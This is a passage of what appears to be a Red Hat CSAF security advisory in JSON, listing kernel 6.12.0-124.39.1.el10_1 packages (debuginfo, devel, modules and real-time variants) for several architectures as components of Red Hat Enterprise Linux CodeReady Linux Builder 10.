"name": "kernel-debuginfo-common-ppc64le-0:6.12.0-124.39.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-debuginfo-common-ppc64le-0:6.12.0-124.39.1.el10_1.ppc64le"
},
"product_reference": "kernel-debuginfo-common-ppc64le-0:6.12.0-124.39.1.el10_1.ppc64le",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debuginfo-common-s390x-0:6.12.0-124.39.1.el10_1.s390x as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-debuginfo-common-s390x-0:6.12.0-124.39.1.el10_1.s390x"
},
"product_reference": "kernel-debuginfo-common-s390x-0:6.12.0-124.39.1.el10_1.s390x",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debuginfo-common-x86_64-0:6.12.0-124.39.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-debuginfo-common-x86_64-0:6.12.0-124.39.1.el10_1.x86_64"
},
"product_reference": "kernel-debuginfo-common-x86_64-0:6.12.0-124.39.1.el10_1.x86_64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-devel-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-devel-0:6.12.0-124.39.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.ppc64le"
},
"product_reference": "kernel-devel-0:6.12.0-124.39.1.el10_1.ppc64le",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-devel-0:6.12.0-124.39.1.el10_1.s390x as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.s390x"
},
"product_reference": "kernel-devel-0:6.12.0-124.39.1.el10_1.s390x",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-devel-0:6.12.0-124.39.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.x86_64"
},
"product_reference": "kernel-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-devel-matched-0:6.12.0-124.39.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.ppc64le"
},
"product_reference": "kernel-devel-matched-0:6.12.0-124.39.1.el10_1.ppc64le",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-devel-matched-0:6.12.0-124.39.1.el10_1.s390x as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.s390x"
},
"product_reference": "kernel-devel-matched-0:6.12.0-124.39.1.el10_1.s390x",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-devel-matched-0:6.12.0-124.39.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.x86_64"
},
"product_reference": "kernel-devel-matched-0:6.12.0-124.39.1.el10_1.x86_64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-doc-0:6.12.0-124.39.1.el10_1.noarch as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-doc-0:6.12.0-124.39.1.el10_1.noarch"
},
"product_reference": "kernel-doc-0:6.12.0-124.39.1.el10_1.noarch",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-0:6.12.0-124.39.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.ppc64le"
},
"product_reference": "kernel-modules-0:6.12.0-124.39.1.el10_1.ppc64le",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-0:6.12.0-124.39.1.el10_1.s390x as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.s390x"
},
"product_reference": "kernel-modules-0:6.12.0-124.39.1.el10_1.s390x",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-0:6.12.0-124.39.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.x86_64"
},
"product_reference": "kernel-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-core-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-core-0:6.12.0-124.39.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.ppc64le"
},
"product_reference": "kernel-modules-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-core-0:6.12.0-124.39.1.el10_1.s390x as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.s390x"
},
"product_reference": "kernel-modules-core-0:6.12.0-124.39.1.el10_1.s390x",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-core-0:6.12.0-124.39.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.x86_64"
},
"product_reference": "kernel-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-extra-0:6.12.0-124.39.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.ppc64le"
},
"product_reference": "kernel-modules-extra-0:6.12.0-124.39.1.el10_1.ppc64le",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-extra-0:6.12.0-124.39.1.el10_1.s390x as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.s390x"
},
"product_reference": "kernel-modules-extra-0:6.12.0-124.39.1.el10_1.s390x",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64"
},
"product_reference": "kernel-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.ppc64le"
},
"product_reference": "kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.ppc64le",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.s390x as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.s390x"
},
"product_reference": "kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.s390x",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.x86_64"
},
"product_reference": "kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.x86_64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-rt-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-rt-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-0:6.12.0-124.39.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-rt-0:6.12.0-124.39.1.el10_1.x86_64"
},
"product_reference": "kernel-rt-0:6.12.0-124.39.1.el10_1.x86_64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-64k-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-rt-64k-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-rt-64k-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-64k-core-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-rt-64k-core-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-rt-64k-core-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-64k-debug-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-rt-64k-debug-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-rt-64k-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-64k-debug-core-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-rt-64k-debug-core-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-rt-64k-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-64k-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-rt-64k-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-rt-64k-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-64k-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-rt-64k-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-rt-64k-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-64k-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-rt-64k-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-rt-64k-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-64k-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-rt-64k-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-rt-64k-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-64k-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-rt-64k-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-rt-64k-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-64k-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-rt-64k-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-rt-64k-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-64k-devel-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-rt-64k-devel-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-rt-64k-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-64k-modules-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-rt-64k-modules-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-rt-64k-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-64k-modules-core-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-rt-64k-modules-core-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-rt-64k-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-64k-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-rt-64k-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-rt-64k-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-core-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-rt-core-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-rt-core-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-core-0:6.12.0-124.39.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-rt-core-0:6.12.0-124.39.1.el10_1.x86_64"
},
"product_reference": "kernel-rt-core-0:6.12.0-124.39.1.el10_1.x86_64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-rt-debug-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-rt-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-0:6.12.0-124.39.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-rt-debug-0:6.12.0-124.39.1.el10_1.x86_64"
},
"product_reference": "kernel-rt-debug-0:6.12.0-124.39.1.el10_1.x86_64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-core-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-rt-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-core-0:6.12.0-124.39.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.39.1.el10_1.x86_64"
},
"product_reference": "kernel-rt-debug-core-0:6.12.0-124.39.1.el10_1.x86_64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-rt-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64"
},
"product_reference": "kernel-rt-debug-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-rt-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-devel-0:6.12.0-124.39.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.39.1.el10_1.x86_64"
},
"product_reference": "kernel-rt-debug-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-rt-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-modules-0:6.12.0-124.39.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.39.1.el10_1.x86_64"
},
"product_reference": "kernel-rt-debug-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-rt-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-modules-core-0:6.12.0-124.39.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.39.1.el10_1.x86_64"
},
"product_reference": "kernel-rt-debug-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-rt-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64"
},
"product_reference": "kernel-rt-debug-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-rt-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64"
},
"product_reference": "kernel-rt-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-devel-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-rt-devel-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-rt-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-devel-0:6.12.0-124.39.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-rt-devel-0:6.12.0-124.39.1.el10_1.x86_64"
},
"product_reference": "kernel-rt-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-modules-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-rt-modules-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-rt-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-modules-0:6.12.0-124.39.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-rt-modules-0:6.12.0-124.39.1.el10_1.x86_64"
},
"product_reference": "kernel-rt-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-modules-core-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-rt-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
